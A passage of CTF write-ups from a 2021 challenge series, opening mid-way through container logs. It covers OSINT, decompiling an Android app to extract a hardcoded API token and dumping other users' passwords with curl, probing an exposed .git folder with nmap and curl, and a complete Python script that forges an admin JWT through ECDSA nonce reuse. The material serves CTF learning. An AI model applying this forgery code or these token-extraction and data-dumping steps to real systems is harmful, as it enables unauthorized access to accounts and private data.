seconds (startsecs)chrome_1 | 23:15:20.245 INFO [GridLauncherV3.lambda$buildLaunchers$3] - Launching a standalone Selenium Server on port 4444chrome_1 | 2021-02-27 23:15:20.301:INFO::main: Logging initialized @362ms to org.seleniumhq.jetty9.util.log.StdErrLogchrome_1 | 23:15:20.578 INFO [WebDriverServlet.<init>] - Initialising WebDriverServletchrome_1 | 23:15:20.782 INFO [SeleniumServer.boot] - Selenium Server is up and running on port 4444app_1 | WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x559eb2fe5dd0 pid: 6 (default app) app_1 | *** uWSGI is running in multiple interpreter mode ***app_1 | spawned uWSGI master process (pid: 6)app_1 | spawned uWSGI worker 1 (pid: 8, cores: 1000)app_1 | spawned uWSGI http 1 (pid: 9)app_1 | *** running gevent loop engine [addr:0x559eb16b03c0] ***redis_1 | 1:M 27 Feb 2021 23:15:19.033 * monotonic clock: POSIX clock_gettimeredis_1 | 1:M 27 Feb 2021 23:15:19.034 * Running mode=standalone, port=6379.redis_1 | 1:M 27 Feb 2021 23:15:19.034 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.redis_1 | 1:M 27 Feb 2021 23:15:19.034 # Server initializedredis_1 | 1:M 27 Feb 2021 23:15:19.034 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.redis_1 | 1:M 27 Feb 2021 23:15:19.034 * Ready to accept connectionsmysql_1 | 2021-02-27T23:15:22.179362Z 6 [Warning] [MY-010453] [Server] root@localhost is created with an empty password ! Please consider switching off the --initialize-insecure option.mysql_1 | 2021-02-27 23:15:25+00:00 [Note] [Entrypoint]: Database files initializedmysql_1 | 2021-02-27 23:15:25+00:00 [Note] [Entrypoint]: Starting temporary servermysql_1 | 2021-02-27T23:15:25.912366Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.23) starting as process 91mysql_1 | 2021-02-27T23:15:26.051273Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.mysql_1 | 2021-02-27T23:15:26.323589Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended.mysql_1 | 2021-02-27T23:15:26.418110Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Socket: /var/run/mysqld/mysqlx.sockmysql_1 | 2021-02-27T23:15:26.593924Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.mysql_1 | 2021-02-27T23:15:26.594071Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.mysql_1 | 2021-02-27T23:15:26.597263Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory. mysql_1 | 2021-02-27T23:15:26.614617Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.23' socket: '/var/run/mysqld/mysqld.sock' port: 0 MySQL Community Server - GPL.mysql_1 | 2021-02-27 23:15:26+00:00 [Note] [Entrypoint]: Temporary server started.mysql_1 | Warning: Unable to load '/usr/share/zoneinfo/iso3166.tab' as time zone. Skipping it.mysql_1 | Warning: Unable to load '/usr/share/zoneinfo/leap-seconds.list' as time zone. Skipping it.mysql_1 | Warning: Unable to load '/usr/share/zoneinfo/zone.tab' as time zone. Skipping it.mysql_1 | Warning: Unable to load '/usr/share/zoneinfo/zone1970.tab' as time zone. Skipping it.mysql_1 | 2021-02-27 23:15:29+00:00 [Note] [Entrypoint]: GENERATED ROOT PASSWORD: Cahmungoo7aiGhei3Sou7quahpoh1aiXmysql_1 | mysql_1 | 2021-02-27 23:15:29+00:00 [Note] [Entrypoint]: /usr/local/bin/docker-entrypoint.sh: running /docker-entrypoint-initdb.d/schema.sqlmysql_1 | mysql_1 | mysql_1 | 2021-02-27 23:15:29+00:00 [Note] [Entrypoint]: Stopping temporary servermysql_1 | 2021-02-27T23:15:29.149455Z 11 [System] [MY-013172] [Server] Received SHUTDOWN from user root. Shutting down mysqld (Version: 8.0.23).mysql_1 | 2021-02-27T23:15:30.425517Z 0 [System] [MY-010910] [Server] /usr/sbin/mysqld: Shutdown complete (mysqld 8.0.23) MySQL Community Server - GPL.mysql_1 | 2021-02-27 23:15:31+00:00 [Note] [Entrypoint]: Temporary server stoppedmysql_1 |mysql_1 | 2021-02-27 23:15:31+00:00 [Note] [Entrypoint]: MySQL init process done. Ready for start up.mysql_1 |mysql_1 | 2021-02-27T23:15:31.387537Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.23) starting as process 1mysql_1 | 2021-02-27T23:15:31.401642Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started.mysql_1 | 2021-02-27T23:15:31.746814Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended.mysql_1 | 2021-02-27T23:15:31.841751Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sockmysql_1 | 2021-02-27T23:15:31.953439Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed.mysql_1 | 2021-02-27T23:15:31.953633Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel.mysql_1 | 2021-02-27T23:15:31.957612Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory. mysql_1 | 2021-02-27T23:15:31.974972Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.23' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.mysql_1 | mbind: Operation not permittednginx_1 | 172.28.0.1 - - [27/Feb/2021:23:15:57 +0000] "GET / HTTP/1.1" 302 295 "http://127.0.0.1/signin?error=Invalid+session+please+sign+in" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:15:57 +0000] "GET /signin?error=Invalid+session+please+sign+in HTTP/1.1" 200 3061 "http://127.0.0.1/signin?error=Invalid+session+please+sign+in" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:16:23 +0000] "GET /signup HTTP/1.1" 200 4761 "http://127.0.0.1/signin?error=Invalid+session+please+sign+in" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:16:27 +0000] "POST /signup HTTP/1.1" 200 38 "http://127.0.0.1/signup" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:16:29 +0000] "GET /signin HTTP/1.1" 200 2982 "http://127.0.0.1/signup" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:16:32 +0000] "POST /signin HTTP/1.1" 302 209 "http://127.0.0.1/signin" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:16:32 +0000] "GET / HTTP/1.1" 200 3591 "http://127.0.0.1/signin" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:16:34 +0000] "GET /profile/2 HTTP/1.1" 200 3145 "http://127.0.0.1/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:16:57 +0000] "POST /profile/2 HTTP/1.1" 200 3430 "http://127.0.0.1/profile/2" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:16:57 +0000] "POST /debug HTTP/1.1" 200 12 "http://127.0.0.1/profile/2" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:18 +0000] "GET / HTTP/1.1" 200 3591 "http://127.0.0.1/profile/2" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:33 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:34 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:35 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:36 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:37 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:38 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:39 +0000] "GET /req HTTP/1.1" 101 2 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:39 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"chrome_1 | 23:17:40.072 INFO [ActiveSessionFactory.apply] - Capabilities are: {chrome_1 | "browserName": "chrome",chrome_1 | "goog:chromeOptions": {chrome_1 | "extensions": [chrome_1 | ],chrome_1 | "args": [chrome_1 | "--headless",chrome_1 | "--no-sandbox",chrome_1 | "ignore-certificate-errors",chrome_1 | "--disable-dev-shm-usage",chrome_1 | "--disable-gpu",chrome_1 | "user-agent=NotARandomString"chrome_1 | ]chrome_1 | },chrome_1 | "pageLoadStrategy": "none",chrome_1 | "version": ""chrome_1 | }chrome_1 | 23:17:40.073 INFO [ActiveSessionFactory.lambda$apply$11] - Matched factory org.openqa.selenium.grid.session.remote.ServicedSession$Factory (provider: org.openqa.selenium.chrome.ChromeDriverService)chrome_1 | Starting ChromeDriver 88.0.4324.96 (68dba2[d8a106b1144496a718d630a.f0a9c05]6[fSaE7V4E6R4E8]0:3 2bbicnfd4(6)b -fraeiflse/db:r aCnch-heads/4324@{#1784}) on port 15087chrome_1 | Only local connections are allowed.chrome_1 | Please see https://chromedriver.chromium.org/security-considerations for suggestions on keeping ChromeDriver safe.chrome_1 | ChromeDriver was started successfully.chrome_1 | annot assign requested address (99)chrome_1 | 23:17:40.475 INFO [ProtocolHandshake.createSession] - Detected dialect: W3Cchrome_1 | 23:17:40.495 INFO [RemoteSession$Factory.lambda$performHandshake$0] - Started new session eb99cf3b27f2bf31f051b05644c4cebf (org.openqa.selenium.chrome.ChromeDriverService)nginx_1 | 172.29.0.2 - - [27/Feb/2021:23:17:40 +0000] "GET /signin HTTP/1.1" 200 2982 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:40 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.29.0.2 - - [27/Feb/2021:23:17:41 +0000] "POST /signin HTTP/1.1" 302 209 "http://nginx/signin" "NotARandomString" "-"nginx_1 | 172.29.0.2 - - [27/Feb/2021:23:17:41 +0000] "GET / HTTP/1.1" 200 3595 "http://nginx/signin" "NotARandomString" "-"nginx_1 | 172.29.0.2 - - [27/Feb/2021:23:17:41 +0000] "GET /profile/2 HTTP/1.1" 200 3430 "-" "NotARandomString" "-"nginx_1 | 172.29.0.2 - - [27/Feb/2021:23:17:41 +0000] "POST /debug HTTP/1.1" 200 1084 "http://nginx/profile/2" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:41 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:42 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:43 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:44 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:45 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:46 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:47 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"nginx_1 | 172.28.0.1 - - [27/Feb/2021:23:17:48 +0000] "HEAD /profile/2 HTTP/1.1" 200 0 "-" "NotARandomString" "-"^CGracefully stopping... (press Ctrl+C again to force)Stopping agenttester_nginx_1 ... doneStopping agenttester_app_1 ... doneStopping agenttester_browser_1 ... doneStopping agenttester_chrome_1 ... doneStopping agenttester_redis_1 ... doneStopping agenttester_mysql_1 ... done```
# Orion Morra — Support#osint ```This is Stage 1 of Path 3 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. Use open-source intelligence to track down information on Orion. With the flag of this challenge, you should also find a password you can use in later challenges.``` This guy has a [Twitter account](https://twitter.com/OrionMorra) - and on there is a photo of his desk - with the flag on it! `flag{0bcffb17cbcbf4359a42ec45d0ccaf2}` _Orion also had a photo of his monitors - complete with credentials written down on a post-it. Those could be used to access the next challenge `internal`, but unfortunately I never completed that one._
# Centaurus#apk-reversing #postman #http-requests ```This is Stage 3 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. Constellation employees use this app to secure their passwords. Is it really secure? Download the file below.``` Start off by downloading the `centaurus1.apk` file. This is an android app, so that is where we are going! ## Emulating the App I first load up the APK in Android Studio and run it on an emulator. I am able to register a new user, store a note and store a password, and while doing so _I notice in the terminal that the app is contacting an external API_ at `http://challenge.nahamcon.com:31234/api/` Trying to log in with pavo's credentials: ```I/okhttp.OkHttpClient: --> POST http://challenge.nahamcon.com:31234/api/auth Content-Type: application/json; charset=UTF-8 Content-Length: 46 {"password":"starsinthesky","username":"pavo"} --> END POST (46-byte body)I/okhttp.OkHttpClient: <-- 403 FORBIDDEN http://challenge.nahamcon.com:31234/api/auth (1029ms) Content-Type: application/json Content-Length: 43 {"message":"Invalid username or password"} <-- END HTTP (43-byte body)``` Trying to register a new user #1: ```I/okhttp.OkHttpClient: --> POST http://challenge.nahamcon.com:31234/api/usersI/okhttp.OkHttpClient: Content-Type: application/json; charset=UTF-8 Content-Length: 41 {"password":"testtest","username":"test"} --> END POST (41-byte body)I/okhttp.OkHttpClient: <-- 400 BAD REQUEST http://challenge.nahamcon.com:31234/api/users (849ms) Content-Type: application/json Content-Length: 97 {"message":"IntegrityError('(sqlite3.IntegrityError) UNIQUE constraint failed: user.username')"} <-- END HTTP (97-byte body)``` Seems like I can cause an error server-side. Could this be vulnerable to SQL injection? Trying to register a new user again: ```I/okhttp.OkHttpClient: --> POST http://challenge.nahamcon.com:31234/api/users Content-Type: application/json; charset=UTF-8 Content-Length: 45 {"password":"testtest","username":"testuser"} --> END POST (45-byte body)I/okhttp.OkHttpClient: <-- 200 OK http://challenge.nahamcon.com:31234/api/users (870ms) Content-Type: application/json Content-Length: 17 {"success":true} <-- END HTTP (17-byte body)``` So it worked this time? Log in then: ```I/okhttp.OkHttpClient: --> POST http://challenge.nahamcon.com:31234/api/auth Content-Type: application/json; charset=UTF-8 Content-Length: 45 {"password":"testtest","username":"testuser"} --> END POST (45-byte body)I/okhttp.OkHttpClient: <-- 200 OK http://challenge.nahamcon.com:31234/api/auth (846ms) Content-Type: application/json Content-Length: 70 {"username":"testuser","uuid":"e9b0175d-d9cb-4ec5-89a8-d8e8269a221b"} <-- END HTTP (70-byte body)``` I get an `uuid` back, and when it immediately after starts looking for my user's passwords, I recognize it using the `uuid` to do so: ```I/okhttp.OkHttpClient: --> GET http://challenge.nahamcon.com:31234/api/users/e9b0175d-d9cb-4ec5-89a8-d8e8269a221b --> END GETI/okhttp.OkHttpClient: --> GET http://challenge.nahamcon.com:31234/api/passwords/e9b0175d-d9cb-4ec5-89a8-d8e8269a221bI/okhttp.OkHttpClient: --> END GET``` So if I knew some other uuid - would I be able to request _any_ stored note or password? How about trying to `GET` users? ```$ curl --location --request GET 'http://challenge.nahamcon.com:31234/api/users'{"message":"Wrong Authorization Header"}``` Well, it didn't crash - so maybe we should start looking trough the code and see if we can find something to use for authorization there. ## Breaking the code open in JADX I open up the code in jadx-gui with the `show inconsistent code` flag set - just to be sure. The code is fairly neat and easy to read, and inside `com.congon4tor.centaurus.api.APIClient` we have the following code: ```javapublic APIClient() { HttpLoggingInterceptor httpLoggingInterceptor = new HttpLoggingInterceptor(); httpLoggingInterceptor.setLevel(HttpLoggingInterceptor.Level.BODY); Retrofit build = new Retrofit.Builder().baseUrl("http://challenge.nahamcon.com:31234/api/").client(new OkHttpClient.Builder().addInterceptor(httpLoggingInterceptor).addInterceptor(new Interceptor() { /* class com.congon4tor.centaurus.api.APIClient.AnonymousClass1 */ @Override // okhttp3.Interceptor public Response intercept(Interceptor.Chain chain) throws IOException { return chain.proceed(chain.request().newBuilder().addHeader("Authorization", "ZUBoMXQybXw0RlhFU05TNVpBMiZndkRLSmRfZDVYZDM=").build()); } }).build()).addConverterFactory(GsonConverterFactory.create()).build(); retrofit = build; this.apiService = (APIService) build.create(APIService.class);}``` If we didn't figure it out before, there we have a pretty good clue what is going on - as well as a hardcoded authorization token! Let us try those GET requests again ```$ curl --location --request GET 'http://challenge.nahamcon.com:31234/api/users' --header 'Authorization: ZUBoMXQybXw0RlhFU05TNVpBMiZndkRLSmRfZDVYZDM='``` And we get a really long list of users, some who are "real" and some who are made by other CTF participants. Below are the ones that turned out to be of interest, together with that `uuid`'s output from ```$ curl --location --request GET 'http://challenge.nahamcon.com:31234/api/passwords/2164421e-3cdc-465f-b1fc-2da0bed89a6c' --header 'Authorization: ZUBoMXQybXw0RlhFU05TNVpBMiZndkRLSmRfZDVYZDM='$ curl --location --request GET 'http://challenge.nahamcon.com:31234/api/notes/2164421e-3cdc-465f-b1fc-2da0bed89a6c' --header 'Authorization: ZUBoMXQybXw0RlhFU05TNVpBMiZndkRLSmRfZDVYZDM='``` ```json# api/users{ "username": "gemini.coley", "uuid": "2164421e-3cdc-465f-b1fc-2da0bed89a6c"} # api/passwords{ "name": "My Super Password", "password": "wJ2=aBpu*nKr6ZnL", "username": "gemini.coley"} # api/notes{ "content": "flag{4a8f943a965086945794066f7ce97f23}", "name": "flag"}``` ```json# api/users{ "username": "pavo.welly", "uuid": "b4bc4415-bb08-49aa-9b87-c3f232253c4d"} # api/passwords{ "name": "Work Password", "password": "LQ8cHu*_dfAM?sxD", "username": "pavo.welly"}``` ... not so useful (but entertaining) notes: ```json# api/users{ "username": "congon4tor", "uuid": "f5e80b35-8e12-43a5-88a5-7bc8585ab234"} # api/notes{ "content": "https://youtube.com/watchv=dPWkNS5AMVM", "name": "Cool stuff"}``` With this done, it was on to the NASCAR challenge!
# Bionic#osint #nmap #curl```mdThank you for taking on The Mission. You can begin by exploring the CONSTELLATIONS public website, [constellations.page](https://constellations.page/). CONSTELLATIONS has "tried" to reduce their attack surface by offering just a static website. But you might find some low-hanging fruit to get you started. You should find the flag for this challenge `ON THIS constellations.page website.` With the flag of this challenge, you should also find a new URL that will assist in the next challenge. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges.``` When looking at the source of the web page, we find a comment letting us know that there might be some interesting information available to us - _somewhere_. ```html ``` After looking around a bit, I decided to run an NMAP scan against the site. This provided some very useful information towards solving this part of the mission: ```sudo nmap -sS -A -v -p 80, 433 -o constellation.page.nmap 34.117.193.93...PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.25 ((Debian))| http-git:| 34.117.193.93:80/.git/| Git repository found!| .git/config matched patterns 'user'| Repository description: Unnamed repository; edit this file 'description' to name the...|_ Last commit message: Management said I need to remove the team details so I redac...| http-methods:|_ Supported Methods: OPTIONS HEAD GET POST| http-robots.txt: 1 disallowed entry|_/meet-the-team.html|_http-server-header: Apache/2.4.25 (Debian)|_http-title: CONSTELLATIONS``` I could not view the `.git/` folder found in the nmap scan, but I could curl some of the normal files found within a .git-folder. ```$ curl -v 34.117.193.93:80/.git/config* Trying 34.117.193.93:80...* Connected to 34.117.193.93 (34.117.193.93) port 80 (#0)> GET /.git/config HTTP/1.1> Host: 34.117.193.93> User-Agent: curl/7.74.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200 OK< Date: Sat, 13 Mar 2021 13:31:13 GMT< Server: Apache/2.4.25 (Debian)< Last-Modified: Tue, 23 Feb 2021 23:53:44 GMT< ETag: "9c-5bc09a0ea7200"< Accept-Ranges: bytes< Content-Length: 156< Via: 1.1 google<[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true[user] name = Leo Rison email = [email protected]* Connection #0 to host 34.117.193.93 left intact``` This gave me a new mail and an email address - saved those for later. Then, to have a look at the latest commits: ```shcurl -v 34.117.193.93:80/.git/COMMIT_EDITMSG* Trying 34.117.193.93:80...* Connected to 34.117.193.93 (34.117.193.93) port 80 (#0)> GET /.git/COMMIT_EDITMSG HTTP/1.1> Host: 34.117.193.93> User-Agent: curl/7.74.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200 OK< Date: Sat, 13 Mar 2021 13:43:39 GMT< Server: Apache/2.4.25 (Debian)< Last-Modified: Wed, 24 Feb 2021 00:20:18 GMT< ETag: "162-5bc09ffecf480"< Accept-Ranges: bytes< Content-Length: 354< Via: 1.1 google<Management said I need to remove the team details so I redacted that page and added it to robots.txt# Please enter the commit message for your changes. Lines starting# with '#' will be ignored, and an empty message aborts the commit.## HEAD detached from 1142cc3# Changes to be committed:# modified: meet-the-team.html# new file: robots.txt#* Connection #0 to host 34.117.193.93 left intact``` Well, I did see a `robots.txt` mentioned in the nmap scan as well - so maybe that is something to check out then. And indeed, curled it and we got our flag! ```$ curl https://constellations.page/robots.txtUser-agent: *Disallow: /meet-the-team.html flag{33b5240485dda77430d3de22996297a1} # this flag is for `Bionic```` _Note: I did not use `gobuster` or `nikto` scans as the CTF organizers specifically asked people not to use automated tools._
```py# Run this script in python 3.8 or newer import base64import hashlib """Disclaimer: I did not solve this challenge under the CTF (although I was close). This was solved after the CTF had finished with some help from the challenge author.I am sharing this as a writeup to help others who like me were curious about the solution to this challenge, yet since so few actually solved it there has beenno solution made public until now. Since the algorithm as described in the header is ES256, the curve is P-256 (see: https://ldapwiki.com/wiki/ES256). Logging in with different usernames gives a signature with the same prefix,so there's likely a reuse of k-values. The last 32 bytes of the signature is a SHA256 hash of the token header and payload. I recommend you to read https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm#Signature_generation_algorithm,which details an attack on repeated k-values, and is implemented in this python script. Reading this will give you a better understandingof this script. Suprisingly, you didn't have to mess with curves of any kind to solve this challenge, just some basic modular artihmetic, web stuff, and perhaps some research""" # curve parameters of P-256 (see: https://ldapwiki.com/wiki/P-256)n = 115792089210356248762697446949407573529996955224135760342422259061068512044369L_n = len(bin(n)[2:]) def parse_signature(token): t = token.split(".") sig = base64.urlsafe_b64decode(t[2]+"===") m = t[0]+"."+t[1] e = hashlib.sha256(m.encode()).digest() z = int(bin(int(e.hex(),16))[2:L_n+2],2) r = int(sig[:-32].hex(),16) # start of the signature is r, which is defined as the x-component of the point k*G on the curve s = int(sig[-32:].hex(),16) # the last 32 bytes of the signature is the s value return r,s,z # two tokes generated for the usernames "admim" and "admio" respectivelytoken1 = "eyJhbGciOiAiRVMyNTYiLCAidHlwIjogIkpXVCJ9.eyJ1c2VybmFtZSI6ICJhZG1pbSJ9.wN0kGlDUj5n8x6GGptROB2PskEeOHe-ONvXE6VDWevuMm5QA7M6_aA7V3oa0ohEVhggmzaDWBArvODBI1in4IQ"token2 = "eyJhbGciOiAiRVMyNTYiLCAidHlwIjogIkpXVCJ9.eyJ1c2VybmFtZSI6ICJhZG1pbyJ9.wN0kGlDUj5n8x6GGptROB2PskEeOHe-ONvXE6VDWevucC-db4xgw8VCtuYuKyMUSvvJ7qI8dKwOmWdBDj8dy2g" # calculate the signature parameters from the tokensr1, s1, z1 = parse_signature(token1)r2, s2, z2 = parse_signature(token2) assert r1==r2 # checks if the r-values match for the two signatures, if they do (spoiler alert: they do), then the same k-value is used and a signature can be forged # recover the private key d from the two signatures using modular arithmetic (read the wikipedia article)k = ((z1-z2)*pow((s1-s2)%n,-1,n))%n # k = (z-z')/(s-s') (mod n)d = ((s1*k-z1)*pow(r1,-1,n))%n # header and payload of the JWTadmin_token = b"eyJhbGciOiAiRVMyNTYiLCAidHlwIjogIkpXVCJ9." + base64.urlsafe_b64encode(b'{"username": "admin"}')admin_token = admin_token.replace(b"=",b"") # calculate the signature using the recovered private key (again, read the wikipedia article)e = hashlib.sha256(admin_token).digest() # e = HASH(m)z = int(bin(int(e.hex(),16))[2:L_n+2],2) # z = e[:L_n] (in bits)r = r1s = (pow(k,-1,n)*(z+r*d))%n # s = (z+rd)/k (mod n) # putting r and s together and encodingsignature = bytes.fromhex(hex(r)[2:]) + bytes.fromhex(hex(s)[2:])admin_token += b"." + base64.urlsafe_b64encode(signature) # print forged tokenprint(admin_token)```
# Meet the Team ```mdRecover the list of employees working at CONSTELLATIONS. With the flag of this challenge, you should find new information that will help with future challenges. You should find the flag for this challenge ON THIS constellations.page website. You will not find it on GitHub. HINT: "Can we please stop sharing our version control software out on our website?" HINT AGAIN: you are looking for a _publicly accessible version control software folder published on_ the constellations.page website itself After solving this challenge, you may need to refresh the page to see the newly unlocked challenges.``` Well, at this point I know about the `/.git/` folder, and the commit message clearly says something was removed. This could be confirmed by visiting [constellations.page/meet-the-team.html](https://constellations.page/meet-the-team.html) as it will give a message saying that info was redacted. ## Snooping around .git/logs ```$ curl -v 34.117.193.93:80/.git/logs/HEAD* Trying 34.117.193.93:80...* Connected to 34.117.193.93 (34.117.193.93) port 80 (#0)> GET /.git/logs/HEAD HTTP/1.1> Host: 34.117.193.93> User-Agent: curl/7.74.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200 OK< Date: Sat, 13 Mar 2021 14:04:12 GMT< Server: Apache/2.4.25 (Debian)< Last-Modified: Wed, 24 Feb 2021 00:20:18 GMT< ETag: "799-5bc09ffecf480"< Accept-Ranges: bytes< Content-Length: 1945< Via: 1.1 google<0000000000000000000000000000000000000000 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614124430 -0500 commit (initial): Added initial assets and landing page1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614124968 -0500 commit: Added the Meet The Team page87b17a86409582c162e260795afdf104dc1d46b1 8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 Leo Rison <[email protected]> 1614125173 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614125488 -0500 checkout: moving from master to 87b17a87b17a86409582c162e260795afdf104dc1d46b1 0780dea9ede681b1e4276d74740bb11056d97c39 Leo Rison <[email protected]> 1614125881 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt0780dea9ede681b1e4276d74740bb11056d97c39 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614125918 -0500 checkout: moving from 0780dea9ede681b1e4276d74740bb11056d97c39 to 87b17a86409582c162e260795afdf104dc1d46b187b17a86409582c162e260795afdf104dc1d46b1 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614125954 -0500 checkout: moving from 87b17a86409582c162e260795afdf104dc1d46b1 to 1142cc1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 Leo Rison <[email protected]> 1614125972 -0500 commit: Added the Meet The Team page4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 e7d4663ac6b436f95684c8bfc428cef0d7731455 Leo Rison <[email 